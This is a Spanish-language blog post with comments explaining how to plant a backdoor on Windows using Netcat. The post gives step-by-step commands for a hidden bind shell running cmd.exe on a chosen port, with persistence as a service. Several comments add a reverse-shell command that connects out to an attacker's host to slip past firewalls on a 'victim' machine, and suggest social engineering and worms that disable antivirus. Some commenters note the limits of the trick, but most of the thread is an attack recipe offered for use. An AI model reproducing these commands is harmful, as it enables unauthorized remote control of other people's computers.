Como crear un backdoor en windows



Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da :P

En cuatro simples pasos se puede crear un lindo colador sin necesidad de mucho esfuerzo simplemente usando Netcat.

1.- descargar la versión para windows de Netcat
2.- Descomprimirla el nc.exe en %SYSTEMROOT%\system32
3.- Ejecutar nc -d -L -e cmd.exe -p 10001 o cualquier número que sea el puerto que deseen usar para entrar luego :P
4.- Desde cualquier máquina remota entrar con telnet a ese puerto y tienen total acceso a esa máqina.

Obviamente al cerrar la aplicación se corta la comunicación salvo que lo instalen como servicio :P

Este fabulósico recurso es cortesía de Hackosis, ya saben, cuando algo ande mal, es probable que esten en tu sistema operativo sin que lo sepas :P

Si te gustó esta nota podés...
Invitame un café en cafecito.app

Categoría: Informática Etiquetas:  

Otros posts que podrían llegar a gustarte...

Comentarios

  • Che pero con un buen firewall esto igual pasa? :s

    • Responder
    • Citar
    • Comentado:
  • myNick    

    Se te viene una catarata de HOYGAN. :D

    • Responder
    • Citar
    • Comentado:
  • Fabio    


    Jooako9205 dijo:

    Che pero con un buen firewall esto igual pasa? :s


    usá el port 443 y puede pasar, obviamente, si le instalás esto a alguien lo agregás en el firewall, se supone que tuviste acceso físico a la pc

    • Responder
    • Citar
    • Comentado:
  • MaTu    

    Jooako9205 dijo:

    Che pero con un buen firewall esto igual pasa? :s


    Esto no pasa con ningún Firewall (ni siquiera con el de Windows) a menos que abras explícitamente el puerto. O sea, para tomar control de la máquina, tenes que tener control previamente. Desde afuera no podés ni instalarle el netcat, ni abrirle el puerto. Y si tenés acceso a la consola, pero no sos admin, tampoco podés hacerlo.

    Ahora, si ya vas a ir a tocar el firewall este mecanismo te sirve para abrir un backdoor en cualquier sistema operativo (Windows, Unix, Linux, OS X, VMS, etc).

    • Responder
    • Citar
    • Comentado:
  • Fabio    


    MaTu dijo:

    Jooako9205 dijo:
    Che pero con un buen firewall esto igual pasa? :s


    Esto no pasa con ningún Firewall (ni siquiera con el de Windows) a menos que abras explícitamente el puerto. O sea, para tomar control de la máquina, tenes que tener control previamente. Desde afuera no podés ni instalarle el netcat, ni abrirle el puerto. Y si tenés acceso a la consola, pero no sos admin, tampoco podés hacerlo.

    Ahora, si ya vas a ir a tocar el firewall este mecanismo te sirve para abrir un backdoor en cualquier sistema operativo (Windows, Unix, Linux, OS X, VMS, etc).


    tal cual y a diferencia de SSH no necesitás una cuenta en particular, usa la que ya está logueada o la de sistema si es que lo instalaste como servicio.

    el tema es que cualquiera que pueda tener acceso físico a tu PC o la del laburo o lo que fuere, te instala esto y listo, accede como quiere. Es otro detalle más de lo que se puede hacer:P

    • Responder
    • Citar
    • Comentado:
  • En realidad, no creo que haga falta acceso a la maquina fisica para instalar esto.
    Con un poco de ingenieria social todo es posible.
    Primero le mandas un video que abra el puerto en el firewall y despues le mandas el otro que se instala y te deja abierta la cosa

    • Responder
    • Citar
    • Comentado:
  • chimango    


    Fabio dijo:

    Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da

    tenés suerte; hace un tiempo una vecina me pidió que le haga la carta astral :-p (estudio astronomía)

    • Responder
    • Citar
    • Comentado:
  • Leo    

    Pero que diferencia hay con un radmin o cualquiera de esos programas?

    • Responder
    • Citar
    • Comentado:
  • Guty    

    Si tengo acceso le arranco el terminal services (?)
    Aguante la navaja suiza

    • Responder
    • Citar
    • Comentado:

  • chimango dijo:

    Fabio dijo:
    Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da

    tenés suerte; hace un tiempo una vecina me pidió que le haga la carta astral :-p (estudio astronomía)


    En realidad, tu vecina quería que le rasques el ombligo desde adentro...ya no saben que excusa inventar.

    • Responder
    • Citar
    • Comentado:
  • Swicher    

    Para los que estén interesados, en el foro de elhacker.net hay un manual sobre el netcat (bueno, también hay otros que sirven para usar el programa de distintas formas) que se encuentra <a href="http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_netcat_pagravera_newbies-t65764.0.html">aqui</a> y también se pueden bajar otro manual del eMule, que esta <a href="ed2k://|file|manual_netcat_castellano_by_kliber.zip|9212|C0FF8C9C2FB26FABF1DDC6C1FC4D22E7|h=C46D67OWZ63DITRWAYETGAAZZZ3YZTUI|/">aqui</a> (espero que este comentario no sea borrado por ser considerado spam o algo así).
    chimango dijo:

    Fabio dijo:
    Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da

    tenés suerte; hace un tiempo una vecina me pidió que le haga la carta astral :-p (estudio astronomía)

    Pero para eso también existen programas (es mas, si te interesa, te paso uno que tengo por ahí) y algún que otro sitio de internet.

    • Responder
    • Citar
    • Comentado:
  • gastonchy    


    CarneDeCañon dijo:


    chimango dijo:
    Fabio dijo:
    Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da

    tenés suerte; hace un tiempo una vecina me pidió que le haga la carta astral :-p (estudio astronomía)


    En realidad, tu vecina quería que le rasques el ombligo desde adentro...ya no saben que excusa inventar.


    Como rascar el ombligo desde adentro, vos decis teniendo sexo ???

    • Responder
    • Citar
    • Comentado:
  • chimango    

    Era muy fiera. A demás, se les nota en la cara (de tontos) cuando lo dicen en serio.
    Swicher, vos lo decís enserio? (o aclaráme un programa para qué)

    • Responder
    • Citar
    • Comentado:
  • MaTu    

    Alejandro(no lo puedo usar mas)? dijo:

    En realidad, no creo que haga falta acceso a la maquina fisica para instalar esto.
    Con un poco de ingenieria social todo es posible.
    Primero le mandas un video que abra el puerto en el firewall y despues le mandas el otro que se instala y te deja abierta la cosa


    Wow! Y cómo haces para abrir un puerto del firewall desde un video? Incluso, si el usuario no es administrador de la máquina, cómo hacés para que cambie (voluntaria o involuntariamente) su configuración?

    • Responder
    • Citar
    • Comentado:
  • MaTu    

    Leo dijo:

    Pero que diferencia hay con un radmin o cualquiera de esos programas?

    Ninguno... Incluso si tenés acceso a la máquina le podés habilitar el servicio de Remote Desktop del XP y no necesitás instalarle nada.

    • Responder
    • Citar
    • Comentado:
  • Subzero    

    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

    • Responder
    • Citar
    • Comentado:

  • Subzero dijo:

    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo


    CAPOOO

    Estos son los comentarios que enorgullecen a la comunidad

    • Responder
    • Citar
    • Comentado:
  • Juan    


    Fabio dijo:


    el tema es que cualquiera que pueda tener acceso físico a tu PC o la del laburo o lo que fuere, te instala esto y listo, accede como quiere. Es otro detalle más de lo que se puede hacer:P


    No es siempre así. Por lo general las PC del laburo y cualquier PC que esté detrás de un router configurado por defecto (serviendo IPs por DHCP) están detrás de un firewall (si está bien configurado) y ahí se puede complicar un toque más reventarlas.

    Supongo que tendría que haber una regla de reenvío de paquetes desde el puerto X del router/server al puerto Y de la máquina en cuestión.

    De todas formas si tenés acceso a la red interna si podrían hacer la chanchada :D

    • Responder
    • Citar
    • Comentado:
  • KMP    


    Subzero dijo:

    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

    o sea que te hicieron el ort* muchas veces? :D

    • Responder
    • Citar
    • Comentado:
  • Fabio    


    Juan dijo:

    Fabio dijo:

    el tema es que cualquiera que pueda tener acceso físico a tu PC o la del laburo o lo que fuere, te instala esto y listo, accede como quiere. Es otro detalle más de lo que se puede hacer:P


    No es siempre así. Por lo general las PC del laburo y cualquier PC que esté detrás de un router configurado por defecto (serviendo IPs por DHCP) están detrás de un firewall (si está bien configurado) y ahí se puede complicar un toque más reventarlas.

    Supongo que tendría que haber una regla de reenvío de paquetes desde el puerto X del router/server al puerto Y de la máquina en cuestión.

    De todas formas si tenés acceso a la red interna si podrían hacer la chanchada :D


    siempre de alguna forma más complicada podés usar IE para que te sirva de proxy, no voy a explicar ahora como :D pero vas a ver a muchos troyanos usando el browser default para hacerlo.

    como podés usar tanto el puerto 80 como el 443 por el browser hay muchos troyanos que lo usan de puerta de enlace. el proxy ya lo tiene autorizado y listo.

    no es el caso que explico aquí, además, para Matu, el 90% de las PCs hogareñas son totalmente vulnerables ya que la mayoría ni el firewall de win$ tienen activo, ni hablar la enorme cantidad de virusetes que te lo desactivan sin pedir permiso.

    • Responder
    • Citar
    • Comentado:

  • KMP dijo:

    Subzero dijo:
    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

    o sea que te hicieron el ort* muchas veces? :D

    +1 :D

    • Responder
    • Citar
    • Comentado:
  • Swicher    

    chimango dijo:

    Era muy fiera. A demás, se les nota en la cara (de tontos) cuando lo dicen en serio.
    Swicher, vos lo decís enserio? (o aclaráme un programa para qué)

    Me refería a un programa para hacer cartas astrales (por ejemplo, en el eMule encontras uno que se llama "Armon", aunque probablemente haya otros mejores) y también hay sitios web que se dedican a estas cuestiones astrologicas,

    Fabio dijo:
    Juan dijo:
    Fabio dijo:

    el tema es que cualquiera que pueda tener acceso físico a tu PC o la del laburo o lo que fuere, te instala esto y listo, accede como quiere. Es otro detalle más de lo que se puede hacer:P


    No es siempre así. Por lo general las PC del laburo y cualquier PC que esté detrás de un router configurado por defecto (serviendo IPs por DHCP) están detrás de un firewall (si está bien configurado) y ahí se puede complicar un toque más reventarlas.

    Supongo que tendría que haber una regla de reenvío de paquetes desde el puerto X del router/server al puerto Y de la máquina en cuestión.

    De todas formas si tenés acceso a la red interna si podrían hacer la chanchada :D


    siempre de alguna forma más complicada podés usar IE para que te sirva de proxy, no voy a explicar ahora como :D pero vas a ver a muchos troyanos usando el browser default para hacerlo.

    como podés usar tanto el puerto 80 como el 443 por el browser hay muchos troyanos que lo usan de puerta de enlace. el proxy ya lo tiene autorizado y listo.

    no es el caso que explico aquí, además, para Matu, el 90% de las PCs hogareñas son totalmente vulnerables ya que la mayoría ni el firewall de win$ tienen activo, ni hablar la enorme cantidad de virusetes que te lo desactivan sin pedir permiso.

    Sobre los virus tenes razón, yo he leído sobre el virus Bagle/Beagle (y alguna que otra variante del mismo) y otros virus que cuando es ejecutado, y en el siguiente reinicio de la computadora, te desactivan (o eliminan) todos los servicios de seguridad, firewall y antivirus que tengas instalado.

    • Responder
    • Citar
    • Comentado:
  • Subzero    


    Dioz Milaneza dijo:

    KMP dijo:
    Subzero dijo:
    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

    o sea que te hicieron el ort* muchas veces? :D

    +1 :D

    Cuando quieran probar saquen turno conmigo que les descoso el orto o a los dos.

    • Responder
    • Citar
    • Comentado:
  • Nick    


    Subzero dijo:

    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo


    <a href="http://www.fabio.com.ar/verpost.php?id_noticia=1434">Huelo un nuevo peluche</a>

    Kakers rulz, iea.

    Perdón, no lo pude evitar

    • Responder
    • Citar
    • Comentado:
  • Nick    


    Subzero dijo:

    Dioz Milaneza dijo:
    KMP dijo:
    Subzero dijo:
    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

    o sea que te hicieron el ort* muchas veces? :D

    +1 :D

    Cuando quieran probar saquen turno conmigo que les descoso el orto o a los dos.




    OMFG Esto puede llegar a ponerse muy bueno.

    Itś gonna be Legen... wait for it... dary :D

    • Responder
    • Citar
    • Comentado:
  • Merlina    


    Fabio dijo:

    Juan dijo:
    Fabio dijo:

    el 90% de las PCs hogareñas son totalmente vulnerables ya que la mayoría ni el firewall de win$ tienen activo, ni hablar la enorme cantidad de virusetes que te lo desactivan sin pedir permiso.


    fui inmediatamente al firewall, está activo. Tengo además el pc tools antivirus.
    En el laburo no me conecto y salvo razones de fuerza mayor (que el prestador me deje sin servicio de internet, lo cual es usual) no utilizo pc pública.
    Ya ni Emule utilizo
    Disculpá mi inquietud hoygan, borrá el comment en todo caso.

    • Responder
    • Citar
    • Comentado:
  • No solo sirve para tener acceso no autorizado a otras shell... Tiene muchísimas utilidades el NetCat, está muy bueno... Podés armar en unos simples pasos un servidor FTP, un SMTP, entre otros...

    Si lo que les interesa es el hack, aca tienen algunas boludeces sobre como "adornar" el netCat, y alguno de los usos complementarios que se les puede dar: http://foro.elhacker.net/hacking_basico/jugando_con_netcat-t159799.0.html

    • Responder
    • Citar
    • Comentado:
  • Me acorde de esto:
    http://elladodelmal.blogspot.com/2008/05/vista-local-tricks.html

    • Responder
    • Citar
    • Comentado:
  • ligthy_xd    

    El firewall nunca es un problema, solo hay que cortarlo, la mejor forma de acceder limpiamente a una pc es dejar un gusano que la prepare, que cambie los registros, desactive los antivirus incluso el firewall...

    Muy buena la foto!!

    • Responder
    • Citar
    • Comentado:
  • NTS94    

    Lo que se debe hacer para evitar que el firewall salte es ejecutar:
    <strong>nc -e cmd.exe </strong>
    Y en nuestra shell:
    <strong>nc -vv -L -p </strong>
    De esta forma, la conexión es saliente desde la máquina víctima y el firewall tan contento. Otra máquina hackeada más.

    • Responder
    • Citar
    • Comentado:
  • NTS94    

    Lo que se debe hacer para evitar que el firewall salte es ejecutar:
    nc -e cmd.exe host puerto
    Y en nuestra shell:
    nc -vv -L -p puerto
    De esta forma, la conexión es saliente desde la máquina víctima y el firewall tan contento. Otra máquina hackeada más

    • Responder
    • Citar
    • Comentado:

Deje su comentario:

Tranquilo, su email nunca será revelado.
La gente de bien tiene URL, no se olvide del http/https
Para evitar bots, si se tardó mucho en leer la nota seguramente no sirva y tenga que intentar dos veces

Negrita Cursiva Imagen Enlace


comentarios ofensivos o que no hagan al enriquecimiento del post serán borrados/editados por el administrador